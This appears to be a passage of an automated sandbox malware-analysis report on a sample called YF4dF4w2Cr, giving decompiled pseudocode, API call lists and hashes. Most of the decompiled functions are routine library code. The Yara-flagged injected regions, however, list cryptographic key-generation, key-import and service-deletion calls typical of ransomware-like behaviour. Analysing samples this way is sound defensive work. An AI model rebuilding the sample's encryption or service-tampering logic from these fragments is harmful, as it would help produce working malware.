                  									 *(_t204 - 0x1c) = _t116;
                  									_t164 = 0;
                  									 *(_t204 - 4) = 0;
                  									__eflags = _t116;
                  									if(__eflags != 0) {
                  										_t164 = E0042EBE0(0, _t116, _t192, _t200, __eflags);
                  									}
                  									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
                  									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
                  									__eflags = _t118;
                  									if(_t118 != 0) {
                  										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                  										_t200 =  *(_t204 - 0x10);
                  										 *(_t192 + 0x3c) = _t164;
                  										L24:
                  										E00431160(_t192, _t204 - 0x88, 0, 0x30);
                  										_t122 =  *((intOrPtr*)(_t204 + 8));
                  										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
                  										 *(_t204 - 0x28) =  *(_t122 + 0x14);
                  										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
                  										E00431160(_t192, _t204 - 0x58, 0, 0x30);
                  										_t207 = _t205 + 0x18;
                  										 *(_t204 - 0x58) = 0x2c;
                  										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
                  										asm("sbb ecx, ecx");
                  										_t175 =  ~(_t109 + 1) & _t200;
                  										 *(_t204 - 0x1c) = _t109;
                  										 *(_t204 - 0x14) = _t175;
                  										__eflags =  *(_t192 + 0x44) - _t109;
                  										if( *(_t192 + 0x44) != _t109) {
                  											L30:
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 == 0xffffffff) {
                  												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                  												L39:
                  												E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
                  												_t131 =  *(_t192 + 0x48);
                  												__eflags = _t131;
                  												if(_t131 != 0) {
                  													__eflags =  *_t131 - 0x2c;
                  													if( *_t131 >= 0x2c) {
                  														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
                  													}
                  												}
                  												 *(_t192 + 0x40) =  *(_t204 - 0x14);
                  												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
                  												__eflags =  *(_t192 + 0x48);
                  												if(__eflags == 0) {
                  													 *(_t192 + 0x48) = E00404461(__eflags, 0x30);
                  													E00431160(_t192, _t134, 0, 0x30);
                  													_t207 = _t207 + 0x10;
                  												}
                  												_t176 = 0xc;
                  												_t200 = _t204 - 0x58;
                  												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
                  												_t192 = _t200 + _t176 + _t176;
                  												L45:
                  												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
                  												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
                  													__eflags =  *(_t204 - 0x38);
                  													if(__eflags == 0) {
                  														_push( *((intOrPtr*)(_t204 - 0x34)));
                  														_t109 = E004316F6(_t164, _t192, _t200, __eflags);
                  													}
                  												}
                  												goto L77;
                  											}
                  											_t179 = 0xc;
                  											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
                  											_t207 = _t207 + 0xc;
                  											_t181 =  *(_t204 - 0x10);
                  											_t139 = _t138 & 0x3fffffff;
                  											 *(_t204 - 0x84) = _t139;
                  											__eflags =  *(_t181 + 0x3c) & 0x00000400;
                  											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
                  												_t148 = _t139 | 0x00000020;
                  												__eflags = _t148;
                  												 *(_t204 - 0x84) = _t148;
                  											}
                  											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
                  											__eflags =  *(_t204 - 0x54) & 0x40000000;
                  											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
                  												L35:
                  												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
                  												_t143 =  *(_t204 - 0x10);
                  												__eflags =  *(_t143 + 0x3c) & 0x00000400;
                  												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
                  													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
                  												}
                  												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
                  												goto L38;
                  											} else {
                  												_t147 = E004117D8( *(_t204 - 0x10));
                  												__eflags = _t147;
                  												if(_t147 == 0) {
                  													L38:
                  													_t192 =  *((intOrPtr*)(_t204 - 0x18));
                  													goto L39;
                  												}
                  												goto L35;
                  											}
                  										}
                  										__eflags =  *(_t192 + 0x40) - _t175;
                  										if( *(_t192 + 0x40) != _t175) {
                  											goto L30;
                  										}
                  										__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 != 0xffffffff) {
                  												_t109 = E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
                  											}
                  										} else {
                  											GetCursorPos(_t204 - 0x20);
                  											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
                  										}
                  										goto L45;
                  									} else {
                  										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
                  										goto L77;
                  									}
                  								}
                  								_t156 = E00410293(_t164);
                  								__eflags = _t156 -  *(_t204 - 0x14);
                  								if(_t156 !=  *(_t204 - 0x14)) {
                  									 *((intOrPtr*)( *_t164 + 0x60))();
                  									 *((intOrPtr*)( *_t164 + 4))(1);
                  									_t164 = 0;
                  									__eflags = 0;
                  									 *(_t192 + 0x3c) = 0;
                  								}
                  								__eflags = _t164;
                  								if(__eflags != 0) {
                  									goto L24;
                  								} else {
                  									goto L19;
                  								}
                  							} else {
                  								if(_t109 == 0) {
                  									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
                  									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
                  								}
                  								goto L77;
                  							}
                  						}
                  					}
                  				} else {
                  					L50:
                  					__eflags =  *(_t200 + 0x3c) & 0x00000401;
                  					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
                  						L77:
                  						return E00431B73(_t109);
                  					}
                  					_push( *_t163);
                  					while(1) {
                  						_t109 = E0040EE3C(_t163, _t165);
                  						__eflags = _t109;
                  						if(_t109 == 0) {
                  							break;
                  						}
                  						__eflags = _t109 - _t200;
                  						if(_t109 == _t200) {
                  							L57:
                  							__eflags = _t190 - 0x100;
                  							if(_t190 < 0x100) {
                  								L59:
                  								__eflags = _t190 - 0x104 - 3;
                  								if(_t190 - 0x104 > 3) {
                  									_t109 = 0;
                  									__eflags = 0;
                  									L62:
                  									__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
                  										goto L77;
                  									}
                  									__eflags = _t109;
                  									if(__eflags != 0) {
                  										L76:
                  										_t109 = E0040D89A(_t165, __eflags, _t109);
                  										goto L77;
                  									}
                  									__eflags = _t190 - 0x201;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x203;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x204;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x206;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x207;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x209;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa1;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa3;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa4;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa6;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa7;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa9;
                  									if(__eflags != 0) {
                  										goto L77;
                  									}
                  									goto L76;
                  								}
                  								L60:
                  								_t109 = 1;
                  								goto L62;
                  							}
                  							__eflags = _t190 - 0x109;
                  							if(_t190 <= 0x109) {
                  								goto L60;
                  							}
                  							goto L59;
                  						}
                  						__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  							break;
                  						}
                  						_push(GetParent( *(_t109 + 0x20)));
                  					}
                  					__eflags = _t109 - _t200;
                  					if(_t109 != _t200) {
                  						goto L77;
                  					}
                  					goto L57;
                  				}
                  			}


























                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042EED0
                  • GetKeyState.USER32(00000001), ref: 0042EF17
                  • GetKeyState.USER32(00000002), ref: 0042EF24
                  • GetKeyState.USER32(00000004), ref: 0042EF31
                  • GetParent.USER32(?), ref: 0042EF56
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F002
                  • _memset.LIBCMT ref: 0042F019
                  • ScreenToClient.USER32 ref: 0042F037
                  • _memset.LIBCMT ref: 0042F045
                  • GetCursorPos.USER32(?), ref: 0042F08B
                  • SendMessageA.USER32(?,00000412,00000000,?), ref: 0042F0A9
                  • SendMessageA.USER32(?,00000404,00000000,?), ref: 0042F118
                  • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 0042F13E
                  • SendMessageA.USER32(?,00000411,00000001,?), ref: 0042F15D
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042F170
                  • SendMessageA.USER32(?,00000405,00000000,?), ref: 0042F19A
                  • _memset.LIBCMT ref: 0042F1BF
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F200
                  • GetParent.USER32(?), ref: 0042F22F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction ID: 12e6ef49b556adbd16c397df292db5107c7fbfc968b24c64fcc66a0911b4c434
                  • Opcode Fuzzy Hash: cc3f7c5fffe2767f941653c96adc54678b203323e82f91da59ebd024d0d2e5c4
                  • Instruction Fuzzy Hash: 74C1C175B00225DFDF209F65D889BAE7B71BB05300FC1007BEA05E62E1D7799845CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00429112(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				CHAR* _t45;
                  				long _t46;
                  				CHAR* _t50;
                  				long _t55;
                  				void* _t57;
                  				int _t63;
                  				long _t73;
                  				void* _t86;
                  				void* _t89;
                  				CHAR* _t91;
                  				void* _t94;
                  				CHAR* _t99;
                  				CHAR* _t101;
                  
                  				_t92 = __esi;
                  				_t89 = __edx;
                  				_push(0x158);
                  				E00431B04(E0044C60B, __ebx, __edi, __esi);
                  				_t91 =  *(_t94 + 8);
                  				_t45 =  *(_t94 + 0xc);
                  				_t73 =  *(_t94 + 0x10);
                  				_t99 = _t91;
                  				_t75 = 0 | _t99 != 0x00000000;
                  				 *(_t94 - 0x158) = _t45;
                  				_t100 = _t99 != 0;
                  				if(_t99 != 0) {
                  					L2:
                  					_t101 = _t45;
                  					_t75 = 0 | _t101 != 0x00000000;
                  					if(_t101 != 0) {
                  						goto L1;
                  					}
                  					_t77 = _t94 - 0x15c;
                  					_t46 = GetFullPathNameA(_t45, 0x104, _t91, _t94 - 0x15c);
                  					if(_t46 != 0) {
                  						__eflags = _t46 - 0x104;
                  						if(_t46 < 0x104) {
                  							E004014C0(_t94 - 0x154, _t89);
                  							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                  							E00428F81(_t73, __eflags, _t91, _t94 - 0x154);
                  							_t50 = PathIsUNCA( *(_t94 - 0x154));
                  							__eflags = _t50;
                  							if(_t50 != 0) {
                  								L21:
                  								E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
                  								__eflags = 1;
                  								goto L22;
                  							}
                  							_t55 = GetVolumeInformationA( *(_t94 - 0x154), _t50, _t50, _t50, _t94 - 0x164, _t94 - 0x160, _t50, _t50);
                  							__eflags = _t55;
                  							if(_t55 != 0) {
                  								__eflags =  *(_t94 - 0x160) & 0x00000002;
                  								if(( *(_t94 - 0x160) & 0x00000002) == 0) {
                  									CharUpperA(_t91);
                  								}
                  								__eflags =  *(_t94 - 0x160) & 0x00000004;
                  								if(( *(_t94 - 0x160) & 0x00000004) == 0) {
                  									_t57 = FindFirstFileA( *(_t94 - 0x158), _t94 - 0x150);
                  									__eflags = _t57 - 0xffffffff;
                  									if(_t57 == 0xffffffff) {
                  										goto L21;
                  									}
                  									FindClose(_t57);
                  									__eflags =  *(_t94 - 0x15c);
                  									if( *(_t94 - 0x15c) == 0) {
                  										goto L11;
                  									}
                  									__eflags =  *(_t94 - 0x15c) - _t91;
                  									if( *(_t94 - 0x15c) <= _t91) {
                  										goto L11;
                  									}
                  									_t63 = lstrlenA(_t94 - 0x124);
                  									_t86 =  *(_t94 - 0x15c) - _t91;
                  									__eflags = _t63 + _t86 - 0x104;
                  									if(_t63 + _t86 >= 0x104) {
                  										__eflags = _t73;
                  										if(_t73 != 0) {
                  											 *((intOrPtr*)(_t73 + 8)) = 3;
                  											E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
                  										}
                  										L12:
                  										E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
                  										goto L5;
                  									}
                  									__eflags = 0x104;
                  									E00414FEE(_t73, _t89, _t91, 0x104,  *(_t94 - 0x15c), 0x104, _t94 - 0x124);
                  								}
                  								goto L21;
                  							}
                  							L11:
                  							E004290E3(_t73,  *(_t94 - 0x158));
                  							goto L12;
                  						}
                  						__eflags = _t73;
                  						if(_t73 != 0) {
                  							 *((intOrPtr*)(_t73 + 8)) = 3;
                  							E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
                  						}
                  						goto L5;
                  					} else {
                  						E004048ED(_t73, _t77, _t91, 0x104, _t91, 0x104,  *(_t94 - 0x158), 0xffffffff);
                  						E004290E3(_t73,  *(_t94 - 0x158));
                  						L5:
                  						L22:
                  						return E00431B87(_t73, _t91, 0x104);
                  					}
                  				}
                  				L1:
                  				_t45 = E00406436(_t73, _t75, _t91, _t92, _t100);
                  				goto L2;
                  			}

















                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042911C
                  • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,004292E3,?,?,00000000,?,0041D5EC,?,?), ref: 0042915A
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathIsUNCA.SHLWAPI(?,?,?,?,0041D5EC,?,?), ref: 004291CA
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0041D5EC,?,?), ref: 004291F1
                  • CharUpperA.USER32(?), ref: 00429224
                  • FindFirstFileA.KERNEL32(?,?), ref: 00429240
                  • FindClose.KERNEL32(00000000), ref: 0042924C
                  • lstrlenA.KERNEL32(?), ref: 0042926A
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                  • String ID:
                  • API String ID: 624941980-0
                  • Opcode ID: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction ID: 4c08258b8b62b4c28abc3044bc15ce8abfe974271ea14c90092fafafccbe739e
                  • Opcode Fuzzy Hash: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction Fuzzy Hash: 1141C571A00225EBEF259F62DC48BFE7778BF45315F4005EEB405A5291DB384E90CE18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memcpy
                  • String ID:
                  • API String ID: 3131771470-0
                  • Opcode ID: 73c9105ae49c3c53f6ada482c292e5c7291b0b22305bb21d63a38a4a9f4047c9
                  • Instruction ID: 1b7e950ac32ea45f1d8c1968f72422388b7a2cca458793967456893b32b16246
                  • Opcode Fuzzy Hash: 73c9105ae49c3c53f6ada482c292e5c7291b0b22305bb21d63a38a4a9f4047c9
                  • Instruction Fuzzy Hash: 5F023830A0067AEFCF1ACF68C8856FABB75FF44304F1401A9C45797A82D732A569CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00430650(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x463404; // 0x18eab29f
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x466af0 = _t6;
                  				 *0x466aec = _t22;
                  				 *0x466ae8 = _t25;
                  				 *0x466ae4 = _t21;
                  				 *0x466ae0 = _t27;
                  				 *0x466adc = _t26;
                  				 *0x466b08 = ss;
                  				 *0x466afc = cs;
                  				 *0x466ad8 = ds;
                  				 *0x466ad4 = es;
                  				 *0x466ad0 = fs;
                  				 *0x466acc = gs;
                  				asm("pushfd");
                  				_pop( *0x466b00);
                  				 *0x466af4 =  *_t31;
                  				 *0x466af8 = _v0;
                  				 *0x466b04 =  &_a4;
                  				 *0x466a40 = 0x10001;
                  				_t11 =  *0x466af8; // 0x0
                  				 *0x4669f4 = _t11;
                  				 *0x4669e8 = 0xc0000409;
                  				 *0x4669ec = 1;
                  				_t12 =  *0x463404; // 0x18eab29f
                  				_v812 = _t12;
                  				_t13 =  *0x463408; // 0xe7154d60
                  				_v808 = _t13;
                  				 *0x466a38 = IsDebuggerPresent();
                  				_push(1);
                  				E0043F5DB(_t14);
                  				SetUnhandledExceptionFilter(0);
                  				_t17 = UnhandledExceptionFilter("�iF");
                  				if( *0x466a38 == 0) {
                  					_push(1);
                  					E0043F5DB(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00436667
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043667C
                  • UnhandledExceptionFilter.KERNEL32(iF), ref: 00436687
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 004366A3
                  • TerminateProcess.KERNEL32(00000000), ref: 004366AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID: iF
                  • API String ID: 2579439406-3484524759
                  • Opcode ID: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction ID: 1fcaefbcb6034eab115c8829309213c744fcf1b54137cc21ca0acf14dfd41614
                  • Opcode Fuzzy Hash: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction Fuzzy Hash: 1E21F2B8801200EFC700DF95ED45A047BA8FB0A311F12907AE809A7B61F7F199858F4F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00415026(void* __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
                  				signed int _v8;
                  				char _v284;
                  				char _v288;
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				struct HINSTANCE__* _t13;
                  				intOrPtr* _t20;
                  				intOrPtr _t28;
                  				intOrPtr _t29;
                  				void* _t30;
                  				intOrPtr _t36;
                  				signed int _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  				signed int _t45;
                  				void* _t46;
                  
                  				_t36 = __edi;
                  				_t35 = __edx;
                  				_t31 = __ecx;
                  				_t43 = _t45;
                  				_t46 = _t45 - 0x11c;
                  				_t9 =  *0x463404; // 0x18eab29f
                  				_v8 = _t9 ^ _t45;
                  				_t49 = _a4 - 0x800;
                  				_t39 = __ecx;
                  				_t28 = __edx;
                  				if(_a4 != 0x800) {
                  					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                  					if(__eflags == 0) {
                  						goto L10;
                  					} else {
                  						goto L4;
                  					}
                  				} else {
                  					E004048C1(__edx, _t31, __edi, _t39, E00433C67(__edx,  &_v288, 4, "LOC"));
                  					_t46 = _t46 + 0x10;
                  					L4:
                  					_push(_t36);
                  					_t37 =  *(E00431D3E(_t49));
                  					 *(E00431D3E(_t49)) =  *_t16 & 0x00000000;
                  					_push( &_v288);
                  					_t30 = E00431BC3( &_v284, 0x112, 0x111, _t39, _t28);
                  					_t20 = E00431D3E(_t49);
                  					_t50 =  *_t20;
                  					if( *_t20 == 0) {
                  						 *(E00431D3E(__eflags)) = _t37;
                  					} else {
                  						E00405B7A( *((intOrPtr*)(E00431D3E(_t50))));
                  					}
                  					_pop(_t36);
                  					if(_t30 == 0xffffffff || _t30 >= 0x112) {
                  						L10:
                  						_t13 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t13 = LoadLibraryA( &_v284);
                  					}
                  				}
                  				_pop(_t40);
                  				_pop(_t29);
                  				return E00430650(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
                  			}

                  APIs
                  • _strcpy_s.LIBCMT ref: 00415058
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 00415070
                  • __snwprintf_s.LIBCMT ref: 004150A5
                  • LoadLibraryA.KERNEL32(?), ref: 004150E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                  • String ID: LOC
                  • API String ID: 1155623865-519433814
                  • Opcode ID: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction ID: 9d7d416408e1e055de0116fb72f58f37d90779cb6da9a35a11098e22952e4239
                  • Opcode Fuzzy Hash: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction Fuzzy Hash: 49210D71700608EBD7217BA5CC46BDE37ACEF4A315F100867F205A71E1DA7C9E458AA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction ID: f98831e3c7eae32b0ab60125a26eacce2da9133b5da6bf3e8bc862731f23f913
                  • Opcode Fuzzy Hash: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction Fuzzy Hash: 17025930910A6AEFCB1ACFA8C8947EAFB75FF06304F14027ACE5597645C736A561CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 023ED414
                  • lstrlenW.KERNEL32(?), ref: 023ED44A
                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 023ED4A4
                  • DeleteService.ADVAPI32(00000000), ref: 023ED4B1
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 023ED4B8
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 79d4994efae1e338f3c6bb56e8cd3a4cadb28038e81744237af49228c784f934
                  • Instruction ID: 31c1728f5d637fc5a54c0b0e0f421be985dccc297df7c80909c0bb1c9d2b0b30
                  • Opcode Fuzzy Hash: 79d4994efae1e338f3c6bb56e8cd3a4cadb28038e81744237af49228c784f934
                  • Instruction Fuzzy Hash: A5212675A0123E86CF785B189808BBB737CEF24795F400155E987D7591EF246A89CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 023E1F75: CryptAcquireContextW.ADVAPI32(023F26E0,00000000,00000000,00000018,F0000040), ref: 023E1F8E
                    • Part of subcall function 023E1F75: CryptImportKey.ADVAPI32(?,?,00000000,00000000,023F26E4), ref: 023E1FD1
                    • Part of subcall function 023E1F75: LocalFree.KERNEL32(?), ref: 023E1FDC
                    • Part of subcall function 023E1F75: CryptReleaseContext.ADVAPI32(00000000), ref: 023E1FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,023F26E8,023E60FF,?,023EABE4,?,?,?,023EAC8F), ref: 023E2026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,023F26EC,?,023EABE4,?,?,?,023EAC8F), ref: 023E2044
                  • CryptDestroyKey.ADVAPI32(?,023EABE4,?,?,?,023EAC8F), ref: 023E2058
                  • CryptDestroyKey.ADVAPI32(?,023EABE4,?,?,?,023EAC8F), ref: 023E2064
                  • CryptReleaseContext.ADVAPI32(00000000,?,023EABE4,?,?,?,023EAC8F), ref: 023E2072
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateFreeHashImportLocal
                  • String ID:
                  • API String ID: 4169801620-0
                  • Opcode ID: 1a9c2f523a84ecdf2654eaf9327928271385d8b933124a23baf2119cdcb1e183
                  • Instruction ID: aeb5aafe795ae81b598480772404135e1c7287d42b2645bac30b846f1bf73e89
                  • Opcode Fuzzy Hash: 1a9c2f523a84ecdf2654eaf9327928271385d8b933124a23baf2119cdcb1e183
                  • Instruction Fuzzy Hash: 30F0D6B17D0A11EBEFB52B34BD05B17365E7B44746F044924FB42A40E5DBE58C359A0C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
